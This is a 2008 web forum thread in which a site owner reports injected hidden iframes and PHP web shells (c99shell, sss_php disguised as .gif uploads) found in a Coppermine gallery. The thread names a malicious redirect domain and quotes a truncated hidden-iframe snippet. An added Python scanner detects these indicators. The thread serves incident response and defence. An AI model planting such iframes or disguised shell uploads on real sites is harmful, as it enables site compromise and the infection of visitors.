HACKER ATTACK . . . . be careful

Started by aftab1003, October 28, 2008, 06:46:22 PM

aftab1003

hi fellows

I just received a hacker attack on my site http://www.picturerating.us

symptoms of attack...

If you are using a strong and updated antivirus like mine (KAV 7), then you will be notified that your site is trying to download a trojan horse...

Actually there is no virus on your site or server; it's iframe code in the main files, like index, main, home, login, admin etc.
the iframe code is ...

and it redirects the visitors to the site...

bugzilla.highlevel.biz/forum/las

I am using 3 scripts on my site

picturerating.us/picturerating/index.php picture rating
picturerating.us/picture-gallery/index.php coppermine latest update
blog.picturerating.us wordpress latest updated blog

Actually I don't know exactly where the hacker came in, but the only way is where a user can upload some pictures in Coppermine...

It affected all of my websites hosted on my server (hostmonster), but only the main index or important files...

SOLUTION

I am trying to remove the iframe code from each of my files by downloading every file, and then re-uploading it after removing the iframe code...

If anyone finds or is facing any issue of this type, then tell here if you know where the hacker injected the code into our pages, so the ADMIN team can close this security hole to protect the thousands of sites running their script...

I hope this will help other members like me...

Have a nice day and take care.

aftab1003

The infected files found...

The infected files were stored in my gallery...

picturerating.us/picture-gallery/albums/userpics/sss_php.gif: PHP.Shell
picturerating.us/picture-gallery/albums/userpics/c99shell_php.gif: Trojan.PHP.C99Shell

But one thing: I am not allowing anyone to get registered, so how did these files enter?

Solution

Remove these files, and block this .GIF extension for further uploads...
and then remove all iframes manually or ask your host to do this...

GOOD LUCK
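As an added defensive example (not code from this thread or from Coppermine), the two checks this post describes, written in Python: flagging the injected hidden 1x1 iframe and document.write() obfuscation pattern in PHP/HTML files, and rejecting files in the upload directory whose content is PHP source rather than a genuine image. All file names and sample strings used here are constructed.

```python
"""Defensive file checks for the two indicators described in this thread (constructed example)."""
import os
import re
import sys

# Indicator 1: a hidden/1x1 <iframe>, and document.write() of a helper-decoded string (pattern quoted in the first post).
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*(?:(?:width|height)=['\"]?1['\"]?(?=[\s>])|visibility:\s*hidden)[^>]*>",
    re.IGNORECASE)
DOCWRITE_DECODE_RE = re.compile(r"document\.write\(\s*\w+\(\s*\w+\s*\)\s*\)", re.IGNORECASE)

# Indicator 2: PHP source stored under an image extension (e.g. c99shell_php.gif in the post above).
PHP_TAG_RE = re.compile(rb"<\?php|<\?=", re.IGNORECASE)
IMAGE_MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",),
               ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}

def scan_markup(text):
    """Return indicator names found in PHP/HTML source text (empty list if clean)."""
    hits = []
    if HIDDEN_IFRAME_RE.search(text):
        hits.append("hidden-iframe")
    if DOCWRITE_DECODE_RE.search(text):
        hits.append("obfuscated-document-write")
    return hits

def check_upload(name, data):
    """Return a reason if a file in the upload directory is not a genuine image, else None."""
    ext = os.path.splitext(name)[1].lower()
    magic = IMAGE_MAGIC.get(ext)
    if magic is None:
        return "extension not in image allow-list"
    if not data.startswith(magic):           # PHP source renamed to .gif fails here
        return "content does not match %s magic bytes" % ext
    if PHP_TAG_RE.search(data):              # real image header with PHP appended
        return "PHP open tag inside image data"
    return None

def scan_file(path):
    """Route a file to the right check by extension and return its findings."""
    with open(path, "rb") as fh:
        data = fh.read()
    if path.lower().endswith((".php", ".html", ".htm")):
        return scan_markup(data.decode("utf-8", "replace"))
    reason = check_upload(path, data)
    return [reason] if reason else []

if __name__ == "__main__":  # usage: python scan.py index.php albums/userpics/*
    for path in sys.argv[1:]:
        for hit in scan_file(path):
            print("%s: %s" % (path, hit))
```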

Nibbler

You are running version 1.4.17 - certainly not the latest.

Joachim Müller

I have little sympathy for people who are reluctant to upgrade and then blame the app if an attacker was able to exploit known vulnerabilities of the old, outdated version they run.

mattduke19

I'm not using Coppermine, just a basic WordPress blog, but I also lost control of all .php files recently. After using Firebug I found this at the bottom of my page -

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49..(ridiculously long string)....</script>

I'm removing the entire blog for now to see what happens.
Good luck

Joachim Müller

Thanks for your report. If you don't even use coppermine, chances are high that you haven't been infected by a vulnerability in coppermine.
Many hacks (the payload) involve silly <iframe>/<script> code injections, so the fact that an iframe shows doesn't mean anything special.